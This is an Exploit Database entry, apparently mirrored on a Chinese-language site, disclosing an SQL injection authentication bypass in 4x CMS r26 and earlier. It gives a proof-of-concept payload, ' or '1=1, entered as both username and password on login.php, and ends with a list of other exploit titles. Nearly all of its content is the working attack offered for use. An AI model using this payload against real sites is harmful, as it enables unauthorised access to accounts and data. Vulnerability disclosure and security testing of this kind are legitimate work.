4x CMS r26 – Authentication Bypass

Exploit Database
51 阅读

作者： cr4wl3r

日期： 2010-03-21
类别：
- webapps
平台：
- php
来源：https://www.exploit-db.com/exploits/11833/

=======================================================
4x cms <= r26 (Auth Bypass) SQL Injection Vulnerability
=======================================================


[+] 4xcms <= r26 (Auth Bypass) SQL Injection Vulnerability
[+] Discovered by: cr4wl3r
[+] My id: http://inj3ct0r.com/author/945
[+] Original: http://inj3ct0r.com/exploits/11392
[+] Download : http://code.google.com/p/4xcms/downloads/list

[+] PoC: [path]/login.php
User : ' or '1=1
Pass : ' or '1=1

[+] Greetz: All member inj3ct0r.com


# Inj3ct0r.com [2010-03-22]

last Exploits
4x CMS r26 – Authentication Bypass的更多信息

FusionForge 5.0 – Multiple Remote File Inclusions：
Cotonti 0.9.2 – Multiple SQL Injections：
Ricoh myPrint 2.9.2.4 – Hard-Coded Credentials：
iGaming CMS – Multiple SQL Injections：
WordPress Plugin Mingle Forum 1.0.31 – SQL Injection：
WordPress Core 3.0.1 – ‘do_trackbacks()’ SQL Injection：
Neontext WordPress Plugin – Stored XSS：
Secutech RiS-11/RiS-22/RiS-33 – Remote DNS Change：